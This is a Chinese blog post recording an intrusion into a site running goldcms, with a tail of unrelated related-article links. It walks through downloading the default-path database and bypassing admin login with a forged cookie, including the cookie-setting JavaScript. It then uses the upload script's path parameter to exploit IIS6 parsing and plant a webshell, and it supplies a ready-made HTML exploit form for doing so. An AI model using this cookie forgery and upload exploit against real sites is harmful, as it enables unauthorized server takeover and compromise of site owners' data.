goldcms 入侵记录,goldcms 上传漏洞分析

 goldcms是龙骏工作室(蓝狐网络)开发的一套cms系统,

      朋友让帮忙检测他的网站,先找找上传漏洞!找了一圈发现网站没有用户交互,只能后台更新文章。系统使用了ewebeditor2.8,只有一个删除文件的漏洞可以利用,这里不做讨论,我们要的是shell!go!去后台看看,默认的路径没有改,Admin,但是帐号密码没有猜到,登陆也没有注入可利用。

       这可怎么整,越是功能简单的站越难拿,下载份源码看看吧。通过查看源码发现默认数据库路径glodcms#data.mdb 没有改,把#变成%23下载数据库,发现密码经过MD5加密了。上cmd5上一查,是一条收费记录,继续查源码。

       发展根目录下存在一个可以上传的文件upload_flash.asp  upfile_flash.asp  代码如下:

<!--#include file="admin/cook.asp"-->
<!--#include file="upload_wj.inc"-->
<link href="images/css.css" rel="stylesheet" type="text/css">
<%
set upload=new upload_file
if upload.form("act")="uploadfile" then
 filepath=trim(upload.form("filepath"))
 filelx=trim(upload.form("filelx"))
 
 i=0
 for each formName in upload.File
  set file=upload.File(formName)
 
 fileExt=lcase(file.FileExt) '得到的文件扩展名不含有.
 if file.filesize<100 then
 response.write "<script language=javascript>alert('请先选择你要上传的文件!');history.go(-1);</script>"
 response.end
 end if
 if (filelx<>"swf") and (filelx<>"jpg" and filelx<>"rar" and filelx<>"zip" and filelx<>"mid" and filelx<>"mp3" and filelx<>"wav") then
 response.write "<script language=javascript>alert('该文件类型不能上传!');history.go(-1);</script>"
 response.end
 end if
 if filelx="swf" then
 if fileext<>"swf"  then
  response.write "<script language=javascript>alert('只能上传swf格式的Flash文件!');history.go(-1);</script>"
  response.end
 end if
 end if
 if filelx="jpg" then
 if fileext<>"gif" and fileext<>"jpg"  then
  response.write "<script language=javascript>alert('只能上传jpg或gif格式的图片!');history.go(-1);</script>"
  response.end
      end if
 end if
 if filelx="swf" then
 if file.filesize>(3000*1024) then
  response.write "<script language=javascript>alert('Flash文件大小不能超过3m!');history.go(-1);</script>"
  response.end
 end if
 end if
 
 if filelx="jpg" then
 if file.filesize>(1000*1024) then
  response.write "<script language=javascript>alert('图片文件大小不能超过1m!');history.go(-1);</script>"
  response.end
 end if
 end if

 if filelx="mid" then
 if file.filesize>(5000*1024) then
  response.write "<script language=javascript>alert('zip文件大小不能超过5m!');history.go(-1);</script>"
  response.end
 end if
 end if
 
  if filelx="mp3" then
 if file.filesize>(5000*1024) then
  response.write "<script language=javascript>alert('rar文件大小不能超过5m!');history.go(-1);</script>"
  response.end
 end if
 end if
 
   if filelx="rar" then
 if file.filesize>(10000*1024) then
  response.write "<script language=javascript>alert('rar文件大小不能超过10m!');history.go(-1);</script>"
  response.end
 end if
 end if
 
   if filelx="zip" then
 if file.filesize>(10000*1024) then
  response.write "<script language=javascript>alert('rar文件大小不能超过10m!');history.go(-1);</script>"
  response.end
 end if
 end if
 
  if filelx="wav" then
 if file.filesize>(5000*1024) then
  response.write "<script language=javascript>alert('exe文件大小不能超过5m!');history.go(-1);</script>"
  response.end
 end if
 end if

 randomize
 ranNum=int(90000*rnd)+10000
 filename=filepath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&fileExt
session("picurl")=filename
%>
<%
 if file.FileSize>0 then         ''如果 FileSize > 0 说明有文件数据
  'file.SaveAs Server.mappath(filename)   ''保存文件
  file.SaveToFile Server.mappath(FileName)
  'response.write file.FileName&"  上传成功!  <br>"
  'response.write "新文件名:"&FileName&"<br>"
  'response.write "新文件名已复制到所需的位置,可关闭窗口!"
  if filelx="swf" then
  response.write "<script>window.opener.document."&upload.form("FormName")&".size.value='"&int(file.FileSize/1024)&" K'</script>"
  end if
  response.write "<script>window.opener.document."&upload.form("FormName")&"."&upload.form("EditName")&".value='"&FileName&"'</script>"
'if filelx="jpg" then
'call jpegclass(FileName)
'end if
%>
<%
end if
set file=nothing
next
set upload=nothing
end if
%>
<%
sub   jpegclass(imgurl)   '调用过程名    
    Dim   Jpeg,f_Horflip      '建立实例
    Set   Jpeg=Server.CreateObject("Persits.Jpeg")  
          if   imgurl<>""   then  
            Jpeg.Open   Server.MapPath(imgurl)'图片路径并打开它  
          else  
            response.write   "未找到图片路径"  
          exit   sub    
          end   if
   
    Jpeg.Canvas.Font.Color = &HFF0000'' 红色
          Jpeg.Canvas.Font.Bold = True 
          Jpeg.Canvas.Print Jpeg.Width-200, Jpeg.Height-50, "全程科技 Qckj.net"

           '' 保存文件
          Jpeg.Save Server.MapPath(imgurl)
     
          if Jpeg.Width >= 120 and Jpeg.Height >= 90 then
          Jpeg.Width =150 
          Jpeg.Height =120
          end if       

          
    '   保存文件
        Dim sRnd
 Randomize
 sFileName = ""&imgurl& "_s.gif"
         Jpeg.Save   Server.MapPath(sFileName) 
    '   注销对象  
        Set   Jpeg   =   Nothing 
session("slturl")=sFileName
  response.write "<script>window.document.addform.spic.value="&session("slturl")&"</script>"
end   sub
%>

<script language="javascript">
window.alert("文件上传成功!请不要修改生成的链接地址!");
window.close();
</script>

这段代码开头引入了验证用户cookies的文件cookies.asp 和化境无组件上传组件。

先简单看下cookie.asp 的代码:

 <%
if request.cookies("alqj.com")("usernike")="" then
response.Redirect "../index.asp"
response.End
end if
%>

代码很简单,大家一眼就能看出问题所在。对,可以通过cookie绕过用户验证。

我们先来本机写个cookie,首先修改hosts文件,使得域名可以指向本机。调用javascript:

function SetCookie(name,value){
    expires=new Date();
    expires.setTime(expires.getTime()+(86400*365));
    document.cookie=name+"="+value+"; expires="+expires.toGMTString()+"; path=/";
}
function getCookie(Name) {
   var search = Name + "="
   if (document.cookie.length > 0) { // if there are any cookies
      offset = document.cookie.indexOf(search)
      if (offset != -1) { // if cookie exists
         offset += search.length
         end = document.cookie.indexOf(";", offset)
         if (end == -1)
            end = document.cookie.length
         return unescape(document.cookie.substring(offset, end))
      }
   }
   return 0;
}

SetCookie("alqj.com","usernike=longjun");

写入cookie,再把hosts修改回来!

 

         OK现在登陆后台,第一眼就傻,真是太简单了,只有发布新闻和产品的功能,没有看第二眼就把浏览器关了。看来要想拿到shell还得从upfile_flash.asp文件入手,简单给大家解释下这个文件的作用,此文件是上传的处理文件,可以接受多个参数,如:upload_flash.asp?formname=addform&editname=pic&uppath=uppic&filelx=jpg  我们指定了要提交的表单为addform,上传路径为uppic   文件格式为jpg,对照upfile_flash.asp 的代码大家自己琢磨琢磨,几乎没有什么可利用的地方,即使我们写成:http://www.tainuosw.com/upload_flash.asp?formname=addform&editname=asp&uppath=uppic&filelx=asp依然不能上传,会提示“该文件类型不能上传”  ,这个文件写的比较新颖,他不是自动提取文件后缀的,而是通过参数指定,并且格式只能指定为人家预先定好的,那么我们不管是使用a.asp;1.jpg 还是a.asp;jpg 都会被重名名为JPG文件,无论怎么构造都不可能绕过验证!再看下他的命名规则:当前时间加随机数字再加预定的格式,我们企图修改文件类型来达到目的是不可能的了。

       已经12点30了,研究了其他文件的源码企图从里边找到一句话木马,但是和预想的一样,没有。再次登陆后台也没发现什么,看了下ewebeditor2.8的源码,记得以前就看过好几次他的代码了,但是找不出什么可以利用的地方。

      又回头看了下upload_flash.asp,突然灵光一闪,我不可以改文件类型但是可以修改文件保存的路径啊,如果把保存文件的路径改成123.asp ,如果服务器是IIS6,不就能利用IIS6的解析漏洞了吗,对于不知道IIS6解析漏洞的我简单解释一下,如果我们在网站上建立一个文件加123.asp 在他里边放一张图片1.jpg 那么1.jpg的代码会交给ASP核心处理去解析,就是说我们的保存在1.jpg里边的ASP代码会运行,就像http://xxx.xxx.xxx/123.asp;1.jpg 虽然是.JPG 文件结尾,但是;号后边的不会被解析;

       好了,我们重新构造:upload_flash.asp?formname=addform&editname=pic&uppath=123.asp;&filelx=jpg,然后上传我们的木马,由于路径里边出现123.asp  所以会出现404,我们要编码一下或者使用post方式提交!我们本地自己构造表单,把以上几个变量写在隐藏域里,然后上传,那么根据他的命名规则,那么网站根目录会出现一个文件123.asp;2010261232682123.jpg  至此,shell得到。但是文件名是随机的,它保存在session("slturl")里边,可以自己取出来,也可以利用后台的功能取。

利用工具的代码给大家发出来,用利用工具之前要先进行cookie欺骗 。

 

利用工具,自行修改action

<html><head><title>图片上传</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="images/css.css" rel="stylesheet" type="text/css">
<script language="javascript">
<!--
function mysub()
{
  esave.style.visibility="visible";
}
-->
</script>
</head>
<body>
<form name="form1" method="post" action="" enctype="multipart/form-data" >
<div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden">
<TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0>
<TR><td width=20%></td>
<TD bgcolor=#ff0000 width="60%">
<TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0>
<TR>
<td bgcolor=#ffffff align=center><font color=red>正在上传文件,请稍候...</font></td>
</tr>
</table>
</td><td width=20%></td>
</tr></table></div>
<table class="tableBorder" width="90%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#FFFFFF">
<tr>
<td align="center" background="images/admin_bg_1.gif"><b><font color="#ffffff">图片上传
<input type="hidden" name="filepath" value="123.asp;">
<input type="hidden" name="filelx" value="jpg">
<input type="hidden" name="EditName" value="pic">
<input type="hidden" name="SltName" value="">
<input type="hidden" name="FormName" value="addform">
<input type="hidden" name="act" value="uploadfile"></font></b></td>
</tr>
<tr bgcolor="#E8F1FF">
<td align="center" id="upid" height="80"><label>
提交地址:
    <input type="text" name="textfield">
</label>
  选择文件:
<input type="file" name="file1" size="40" class="tx1" value="">
<label>
<input type="submit" name="Submit" value="开始上传" class="button" onclick="javascript:mysub()">
</label></td>
</tr>
</table>
</form>
</body>
</html>

你可能感兴趣的:(cms)

  • springboot+vue项目实战一-创建SpringBoot简单项目 苹果酱0567 面试题汇总与解析springboot后端java中间件开发语言
    这段时间抽空给女朋友搭建一个个人博客,想着记录一下建站的过程,就当做笔记吧。虽然复制zjblog只要一个小时就可以搞定一个网站,或者用cms系统,三四个小时就可以做出一个前后台都有的网站,而且想做成啥样也都行。但是就是要从新做,自己做的意义不一样,更何况,俺就是专门干这个的,嘿嘿嘿要做一个网站,而且从零开始,首先呢就是技术选型了,经过一番思量决定选择-SpringBoot做后端,前端使用Vue做一
  • 常见的 JVM 调优方法有哪些? 爪哇天下 jvm
    常见的JVM调优方法有哪些?可以具体到调整哪个参数,调成什么值?对年轻代的EdenSurvivor的比例进行配置-XX:SurvivorRatio=8:表示设置2个Survivor区:1个Eden区的大小比值为2:8,这意味着Survivor区占整个年轻代的1/5,这个参数默认为8如果经常性的SurvivorTo放不下YGC的剩余的对象时候,可以适当的调整比例常用的CMS收集器:设置回收阈值,需要
  • Vue + Express实现一个表单提交 九旬大爷的梦
    最近在折腾一个cms系统,用的vue+express,但是就一个表单提交就弄了好久,记录一下。环境:Node10+前端:Vue服务端:Express依赖包:vueexpressaxiosexpress-formidableelement-ui(可选)前言:axiosget请求参数是:paramsaxiospost请求参数是:dataexpressget接受参数是req.queryexpresspo
  • python语言爬虫爬取歌曲代码X EYYLTV python爬虫java
    importrequestssong_urls=[“https://m804.music.126.net/20240915142147/4e01caa69abda60b165e185607805ee1/jdyyaac/obj/w5rDlsOJwrLDjj7CmsOj/30379084686/b56a/dbd5/39fc/792d87f5d7014bb78547ec3804eeaac5.m4a?au
  • aspcms webshell漏洞复现 青衫木牛马 aspaspcmsgetshell
    1.【ip】/admin_aspcms/login.asp访问后台,admin123456登录2.点击【扩展功能】【幻灯片设置】点击【保存】开启代理进行抓包3.在抓取的数据包中修改slideTextStatus字段的值为以下代码并进行发包访问影响文件字段值1%25><%25密码是a影响文件/config/AspCms_Config.asp4.蚁剑连接
  • 三十五、Gin注册功能实战 Boo_T gogingolang开发语言后端
    目录一、创建请求组二、service下创建register.go文件三、实现密码加密功能四、在register方法中使用encryptPassword函数一、创建请求组const(rootPath="/api/"noAuthPath="/out/api/")//创建请求组noAuth:=r.Group(noAuthPath)//注册功能路由绑定noAuth.POST("cms/register",
  • 2018-12-09 一只猴子变成了钢笔
    ThevisionthingByChrisGilesPublished:November25200820:24|Lastupdated:November25200820:24http://www.ft.com/cms/s/0/1c1d5a9e-bb29-11dd-bc6c-0000779fd18c.htmlIthasbeenabadyearforeconomicforecasters.Sobadt
  • ads1115驱动程序 STM32 qq_42949957 stm32单片机嵌入式硬件
    #ads1115驱动程序STM32#include"main.h"#include"cmsis_os.h"#include"adc.h"#include"dma.h"#include"usart.h"#include"gpio.h"#defineSET_BSDAHAL_GPIO_WritePin(BSDA_GPIO_Port,BSDA_Pin,GPIO_PIN_SET)#defineSET_BSC
  • python 漏洞扫描器_自动扫描全网漏洞的扫描器 weixin_39649736 python漏洞扫描器
    “因为我相信你以后一定会成为很厉害的人呀”设计初衷早在17年11月份的时候就有这个想法,可是一直没有去做,后来快到除夕前几天才正式开始整个软件工程的设计。当时的想实现的功能比较简单,就是能做到无限采集到网站使用的CMS,比如www。xx。com使用的是DEDECMS,那么我就把www。xx。com|dedecms这样的数据存到数据库里面,如果下次dedecms爆出新的漏洞后,我能在第一时间内发现哪
  • 开源旅游网站系统排名 situcms_ php产品运营小程序
    **NO:1思途旅游网站管理系统**思途cms可以称得上是旅游网站系统中元老级的选手,它基于LAMP平台设计,网站采用PHP+MySQL,开源不加密,支持电脑端网站、移动端网站、微信小程序、微信端和app等10端合一,无年费,高频率定时的免费系统升级。同时提供大量模板供选择(包含多款免费模板)可以后台快速安装自由更换,根据业务需要变换风格。思途cms产品可以拆分购买,较为灵活,同时也提供私人定制,
  • Java架构师学习路线 网络全息测量 心得体会
    (1)第一步:研究spring,hibernate。通过研究jeecms开源框架。也同时学习css,html,javascript,jquery.以前都学习过,不过没有系统学习过,现在必须系统学习。同时看cms相关的论文。然后,改造jeecms能够改为自己的一个开源框架,以后开发cms系统都用我自己开发的框架,作为第一阶段的成果。(2)第二步:学习开源工作流引擎Activiti5,jbpm4.4以
  • EasyDarwin开源平台直播架构 jljf_hh
    ClientClientCMSCMSEasyCameraEasyCameraEasyDarwinEasyDarwin请求设备列表设备列表json请求设备直播(携带SN序列号)推送视频请求(携带EasyDarwin地址和端口)RTSP直播推送RTPStreaming视频推送成功返回具体的视频直播URLRTSP/HTTP直播流程开源代码:https://github.com/EasyDarwin开源资
  • 第十一届国际分子模拟与人工智能应用学术会议 (2023-ICMS&AI) zzl18864612032 人工智能大数据算法云计算
    作为国内历史悠久、分子模拟领域公认的高水平国际学术会议,国际分子模拟与人工智能应用学术会议重磅回归。经过两年的精心筹备,本次会议将于2023年5月6日-7日在成都隆重举行,本次大会将为国内外从事分子模拟人工智能应用和研发创新数字化转型的企业、高校、科研机构的专家与学者,提供最为广泛的交流与合作平台。本届大会主题:洞悉微观,预见未来。会议概况——人工智能、分子模拟赋能科技研发创新过去20年,以计算化
  • Java 面试题 ——JVM 大厂篇之 Java 工程师必备:顶尖工具助你全面监控和分析 CMS GC 性能(2) 青云交 工具秘籍Java虚拟机(JVM)专栏JavajavajvmJava性能优化CMSGC监控JavaCMSGC性能Java性能工具GC分析工具
    亲爱的朋友们,热烈欢迎你们来到我的博客!能与你们在此邂逅,我满心欢喜,深感无比荣幸。在这个瞬息万变的时代,我们每个人都在苦苦追寻一处能让心灵安然栖息的港湾。而我的博客,正是这样一个温暖美好的所在。在这里,你们不仅能够收获既富有趣味又极为实用的内容知识,还可以毫无拘束地畅所欲言,尽情分享自己独特的见解。我真诚地期待着你们的到来,愿我们能在这片小小的天地里共同成长,共同进步。本博客的精华专栏:1.Ja
  • Java面试题--JVM大厂篇之Java工程师必备:顶尖工具助你全面监控和分析CMS GC性能(1) 青云交 工具秘籍Java虚拟机(JVM)专栏Java大厂面试题javajvm顶尖工具监控和分析CMSGCJConsoleVisualVMGC日志分析JProfilerPrometheus+Graf
    亲爱的朋友们,热烈欢迎你们来到我的博客!能与你们在此邂逅,我满心欢喜,深感无比荣幸。在这个瞬息万变的时代,我们每个人都在苦苦追寻一处能让心灵安然栖息的港湾。而我的博客,正是这样一个温暖美好的所在。在这里,你们不仅能够收获既富有趣味又极为实用的内容知识,还可以毫无拘束地畅所欲言,尽情分享自己独特的见解。我真诚地期待着你们的到来,愿我们能在这片小小的天地里共同成长,共同进步。本博客的精华专栏:1.Ja
  • Java面试题--JVM大厂篇之揭秘:如何通过优化 CMS GC 提升各行业服务器响应速度 青云交 java学习Java虚拟机(JVM)专栏JavajavajvmGC(垃圾回收)的优化CMSGC实战案例教育行业CMSGC实战案例游戏行业CMSGC实战案例医疗行业CMSGC实战案例金融行业
    Java面试题--JVM大厂篇之揭秘:如何通过优化CMSGC提升各行业服务器响应速度引言:正文:一、游戏行业1.问题:2.优化措施:二、在线教育行业1.问题:2.优化措施:三、医疗信息化行业1.问题:2.优化措施:四、金融科技行业1.问题:2.优化措施:结束语:引言:早上好,亲爱的各位Java开发者们!在大规模Java应用的浩瀚世界里,性能优化始终是我们聚焦的核心要点,尤其是当我们面对那些对响应速
  • Java面试题--JVM大厂篇之高并发Java应用的秘密武器:深入剖析GC优化实战案例 青云交 Java大厂面试题Java虚拟机(JVM)专栏Javajavajvm不同场景中优化CMSGC高并发Java应用的秘密武器CMSGC电商实战优化案例CMSGC大数据优化案例CMSGC金融系统优化案例
    引言:晚上好,Java开发者们!在高并发的现代应用中,垃圾回收器(GC)是Java性能优化的重要环节。尤其在CMS(ConcurrentMark-Sweep)GC曾经担任主角的日子里,适当的调优和优化措施至关重要。本篇文章将通过三个实际案例,探讨如何在不同场景中优化CMSGC,为你揭示Java性能调优的秘密。vQingYunJiao,无论你是新手还是资深工程师,希望这篇文章能为你提供实践中的宝贵经
  • Java面试题--JVM大厂篇(1-10) 青云交 java学习路线Java大厂面试题JavajvmJavaJVM类加载器栈内存溢出Java面试题Java内存模型(JMM)MinorGC与FullGC
    引言:在这个信息时代,对于准备进入大厂工作的朋友们来说,对于JVM(Java虚拟机)的掌握是面试中的一项重要内容。下面是一些精选的JVM面试题,希望对大家能有所帮助。正文:1.JVM有哪几种垃圾收集器?每种的特点是什么?JVM主要有以下几种垃圾收集器:Serial收集器、ParNew收集器、Parallel收集器、CMS收集器和G1收集器。每种垃圾收集器都有各自的特点,比如Serial是单线程的垃
  • 基于SSM源代码风格Java代码生成器 Maven版开箱即用 摸鱼神器 赛先生和泰先生
    一、序言UCodeCms是一款Maven版的Java源代码生成器,是快速构建项目的利器。代码生成器模块属于可拆卸模块,即按需引入。代码生成器生成SSM(Spring、SpringBoot、MybatisPlus)风格的源代码。面试时经常提到面向对象编程,实际开发中常常是面向数据库编程,随着需求的快速变化,数据库的库表结构也需要相应变化,如何根据库表结构的变化,快速响应到源代码层次,是Java代码生
  • 0基础跟德姆(dom)一起学AI Python进阶03-面向对象版: 学生管理系统 跟德姆(dom)一起学AI python开发语言人工智能
    *面向对象版:学生管理系统*Student学生类*StudentCMS学生管理类*main.py程序的主入口*加入文件:student.txt存储学生信息*深拷贝和浅拷贝*可变类型*不可变类型---1.学生管理系统-分析*涉及到的知识点*面向对象*列表,字典*for,if,input...*文件操作*......*需求分析*结论:分模块(.py文件)进行开发***main.py**程序的主入口**
  • jvm参数-XX:+UseConcMarkSweepGC怎么用? Java搬砖组长 jvmjava1024程序员节
    -XX:+UseConcMarkSweepGC是一种JVM参数,它表示使用并发标记清除垃圾收集器(CMS)来进行内存管理。与传统的标记-清除(Mark-Sweep)垃圾收集器不同,CMS是一种有并发能力的垃圾收集器,它可以在应用程序运行的同时,对堆内存中的垃圾进行回收。使用CMS垃圾收集器具有以下优点:可以在垃圾收集的同时,让应用程序继续运行,减少了停顿时间。由于垃圾回收与应用程序运行并发操作,因
  • WordPress的安装与简单开发教程 CopyLower 学习Wordpressphp
    WordPress是目前世界上最受欢迎的开源内容管理系统(CMS),它以简便易用、扩展性强和庞大的生态系统著称。通过它,你可以轻松构建博客、企业网站、电子商务平台等多种类型的网站。本文将为你介绍WordPress的安装过程,以及如何进行简单的开发。第一部分:WordPress的安装1.1.安装前的准备在安装WordPress之前,你需要准备以下环境:Web服务器:如Apache、Nginx等。PH
  • 2024 WordPress资源展示下载类主题源码开心版 会说源码 源代码管理
    简介:WordPress 资源展示型下载类主题 CeoMax-Pro_v7.6开心版;CeoMax-Pro是一款极致美观强大的WordPress付费资源下载主题,它能满足您所有付费资源下载的业务需求!你的想法与业务不能被主题所限制!CeoMax-Pro强大的功能,在不久的将来它能实现你一切幻想!我们也在为此而不断努力。适用于资源站、下载站、交易站、素材站、源码站、课程站、CMS
  • Java GC 详解:Minor GC和Full GC以及CMS理解 搬山道猿 javajvm开发语言
    ConcurrentMarkandSweep(并发标记-清除)CMS的官方名称为“MostlyConcurrentMarkandSweepGarbageCollector”(主要并发-标记-清除-垃圾收集器).其对年轻代采用并行STW方式的[mark-copy(标记-复制)算法],对老年代主要使用并发[mark-sweep(标记-清除)算法]CMS的设计目标是避免在老年代垃圾收集时出现长时间的卡顿
  • Puock基于WordPress开发的高颜值的自适应主题 支持白天与黑夜模式v2.8.4 专业软件系统开发 源码下载wordpress主题
    内容目录一、详细介绍二、效果展示1.部分代码2.效果图展示三、学习资料下载一、详细介绍WordPress管理后台中的「外观」-「主题」中点击「添加」,选择Puock的主题包进行上传安装并启用即可。提示:为了防止主题不兼容,请在安装主题前进行数据备份,防止数据字段重复覆盖等情况发生。环境要求WordPress>=6.0,PHP>=7.4主题特性支持白天与暗黑模式全局无刷新加载支持博客、CMS、企业三
  • 《Motion Forecasting with Dual Consistency and Multi-Pseudo-Target Supervision》论文阅读之DCMS 山水之间2018 无人驾驶PaperReading大数据轨迹预测自动驾驶人工智能
    目录摘要1简介2相关工作3.方法3.1结构3.2双重一致性约束3.3多伪目标监督3.4学习4实验4.1实验装置4.2实验结果4.3消融研究4.4泛化能力5限制6结论DCMS:具有双重一致性和多伪目标监督的运动预测香港科技大学暂无代码。摘要我们提出了一种具有双重一致性约束和多伪目标监督的运动预测新框架。运动预测任务通过结合过去的空间和时间信息来预测车辆的未来轨迹。DCMS的一个关键设计是提出双重一致
  • 【网络安全】WordPress Uncontrolled Resource Consumption 秋说 网络安全web安全漏洞挖掘wordpress
    未经许可,不得转载。文章目录WordPresswp-cron.php实战漏洞危害解决措施WordPressWordPress是全球最广泛使用的内容管理系统(CMS),目前约有43%的网站依赖于它。由于其用户友好的界面和丰富的插件功能,WordPress成为了全球最受欢迎的CMS。然而,在使用WordPress的过程中,用户常常忽视一些潜在的配置问题,其中之一就是wp-cron.php文件的设置。w
  • Spring Boot入门(第十一章):编辑页面 苍_之涛
    1、添加编辑页面我们将新增页面复制一个,修改几处地方我们设计我们的编辑页面的地址将会是/cms/post/edit/1这种形式,地址最后一块就是我们的文章id,所以我们先需要通过文章id获取原来的文章数据。2、添加页面导航方法修改PostController类在这里可以看到,其实我们也可以在后台获取文章id,将变量放到ftl模板里面去获取,为了以后我们更好的理解前后端分离,这里,我们还是通过前端的
  • wordpress在北美华人中的使用情况分析 podoor wordpress
    WordPress是一个全球广泛使用的开源内容管理系统(CMS),它以其灵活性、易用性和强大的插件生态系统而闻名。在北美华人社区中,WordPress同样受到许多个人和企业的青睐。以下是对WordPress在北美华人中的使用情况的分析:1.语言和文化适应性WordPress支持多语言,这使得它能够很好地适应北美华人社区的需求。许多华人用户选择使用中文或其他语言来创建和维护他们的网站,WordPre
  • JVM-3-JVM调优 宠辱不惊的咸鱼
    问题JDK8默认GC策略PSYoung+ParOld什么时候开始YoungGCEden不够分配时什么时候开始FullGCOld区可用容量不足历次平均晋升担保失败CMS会有什么问题并发失败,并发阶段直接爆掉怎么规避:增大空闲比例G1什么时候会进入FullGC标记期跪掉;FullGC时会采用Serial,所以还是比较可怕的怎么规避:减小开始标记的内存占用阈值InitiatingHeapOccupanc
  • Hadoop(一) 朱辉辉33 hadooplinux
    今天在诺基亚第一天开始培训大数据,因为之前没接触过Linux,所以这次一起学了,任务量还是蛮大的。 首先下载安装了Xshell软件,然后公司给了账号密码连接上了河南郑州那边的服务器,接下来开始按照给的资料学习,全英文的,头也不讲解,说锻炼我们的学习能力,然后就开始跌跌撞撞的自学。这里写部分已经运行成功的代码吧.    在hdfs下,运行hadoop fs -mkdir /u
  • maven An error occurred while filtering resources blackproof maven报错
    转:http://stackoverflow.com/questions/18145774/eclipse-an-error-occurred-while-filtering-resources   maven报错: maven An error occurred while filtering resources   Maven -> Update Proje
  • jdk常用故障排查命令 daysinsun jvm
    linux下常见定位命令: 1、jps      输出Java进程       -q       只输出进程ID的名称,省略主类的名称;       -m      输出进程启动时传递给main函数的参数;     &nb
  • java 位移运算与乘法运算 周凡杨 java位移运算乘法
      对于 JAVA 编程中,适当的采用位移运算,会减少代码的运行时间,提高项目的运行效率。这个可以从一道面试题说起:     问题: 用最有效率的方法算出2 乘以8 等於几?” 答案:2 << 3 由此就引发了我的思考,为什么位移运算会比乘法运算更快呢?其实简单的想想,计算机的内存是用由 0 和 1 组成的二
  • java中的枚举(enmu) g21121 java
    从jdk1.5开始,java增加了enum(枚举)这个类型,但是大家在平时运用中还是比较少用到枚举的,而且很多人和我一样对枚举一知半解,下面就跟大家一起学习下enmu枚举。先看一个最简单的枚举类型,一个返回类型的枚举: public enum ResultType { /** * 成功 */ SUCCESS, /** * 失败 */ FAIL,
  • MQ初级学习 510888780 activemq
    1.下载ActiveMQ 去官方网站下载:http://activemq.apache.org/ 2.运行ActiveMQ 解压缩apache-activemq-5.9.0-bin.zip到C盘,然后双击apache-activemq-5.9.0-\bin\activemq-admin.bat运行ActiveMQ程序。 启动ActiveMQ以后,登陆:http://localhos
  • Spring_Transactional_Propagation 布衣凌宇 springtransactional
    //事务传播属性 @Transactional(propagation=Propagation.REQUIRED)//如果有事务,那么加入事务,没有的话新创建一个 @Transactional(propagation=Propagation.NOT_SUPPORTED)//这个方法不开启事务 @Transactional(propagation=Propagation.REQUIREDS_N
  • 我的spring学习笔记12-idref与ref的区别 aijuans spring
    idref用来将容器内其他bean的id传给<constructor-arg>/<property>元素,同时提供错误验证功能。例如: <bean id ="theTargetBean" class="..." /> <bean id ="theClientBean" class=&quo
  • Jqplot之折线图 antlove jsjqueryWebtimeseriesjqplot
    timeseriesChart.html <script type="text/javascript" src="jslib/jquery.min.js"></script> <script type="text/javascript" src="jslib/excanvas.min.js&
  • JDBC中事务处理应用 百合不是茶 javaJDBC编程事务控制语句
      解释事务的概念; 事务控制是sql语句中的核心之一;事务控制的作用就是保证数据的正常执行与异常之后可以恢复   事务常用命令:             Commit提交         
  • [转]ConcurrentHashMap Collections.synchronizedMap和Hashtable讨论 bijian1013 java多线程线程安全HashMap
    在Java类库中出现的第一个关联的集合类是Hashtable,它是JDK1.0的一部分。 Hashtable提供了一种易于使用的、线程安全的、关联的map功能,这当然也是方便的。然而,线程安全性是凭代价换来的――Hashtable的所有方法都是同步的。此时,无竞争的同步会导致可观的性能代价。Hashtable的后继者HashMap是作为JDK1.2中的集合框架的一部分出现的,它通过提供一个不同步的
  • ng-if与ng-show、ng-hide指令的区别和注意事项 bijian1013 JavaScriptAngularJS
            angularJS中的ng-show、ng-hide、ng-if指令都可以用来控制dom元素的显示或隐藏。ng-show和ng-hide根据所给表达式的值来显示或隐藏HTML元素。当赋值给ng-show指令的值为false时元素会被隐藏,值为true时元素会显示。ng-hide功能类似,使用方式相反。元素的显示或
  • 【持久化框架MyBatis3七】MyBatis3定义typeHandler bit1129 TypeHandler
    什么是typeHandler? typeHandler用于将某个类型的数据映射到表的某一列上,以完成MyBatis列跟某个属性的映射   内置typeHandler MyBatis内置了很多typeHandler,这写typeHandler通过org.apache.ibatis.type.TypeHandlerRegistry进行注册,比如对于日期型数据的typeHandler,
  • 上传下载文件rz,sz命令 bitcarter linux命令rz
    刚开始使用rz上传和sz下载命令: 因为我们是通过secureCRT终端工具进行使用的所以会有上传下载这样的需求: 我遇到的问题: sz下载A文件10M左右,没有问题 但是将这个文件A再传到另一天服务器上时就出现传不上去,甚至出现乱码,死掉现象,具体问题 解决方法: 上传命令改为;rz -ybe 下载命令改为:sz -be filename 如果还是有问题: 那就是文
  • 通过ngx-lua来统计nginx上的虚拟主机性能数据 ronin47 ngx-lua 统计 解禁ip
    介绍 以前我们为nginx做统计,都是通过对日志的分析来完成.比较麻烦,现在基于ngx_lua插件,开发了实时统计站点状态的脚本,解放生产力.项目主页: https://github.com/skyeydemon/ngx-lua-stats 功能 支持分不同虚拟主机统计, 同一个虚拟主机下可以分不同的location统计. 可以统计与query-times request-time
  • java-68-把数组排成最小的数。一个正整数数组,将它们连接起来排成一个数,输出能排出的所有数字中最小的。例如输入数组{32, 321},则输出32132 bylijinnan java
    import java.util.Arrays; import java.util.Comparator; public class MinNumFromIntArray { /** * Q68输入一个正整数数组,将它们连接起来排成一个数,输出能排出的所有数字中最小的一个。 * 例如输入数组{32, 321},则输出这两个能排成的最小数字32132。请给出解决问题
  • Oracle基本操作 ccii Oracle SQL总结Oracle SQL语法Oracle基本操作Oracle SQL
    一、表操作 1. 常用数据类型 NUMBER(p,s):可变长度的数字。p表示整数加小数的最大位数,s为最大小数位数。支持最大精度为38位 NVARCHAR2(size):变长字符串,最大长度为4000字节(以字符数为单位) VARCHAR2(size):变长字符串,最大长度为4000字节(以字节数为单位) CHAR(size):定长字符串,最大长度为2000字节,最小为1字节,默认
  • [强人工智能]实现强人工智能的路线图 comsci 人工智能
        1:创建一个用于记录拓扑网络连接的矩阵数据表      2:自动构造或者人工复制一个包含10万个连接(1000*1000)的流程图      3:将这个流程图导入到矩阵数据表中      4:在矩阵的每个有意义的节点中嵌入一段简单的
  • 给Tomcat,Apache配置gzip压缩(HTTP压缩)功能 cwqcwqmax9 apache
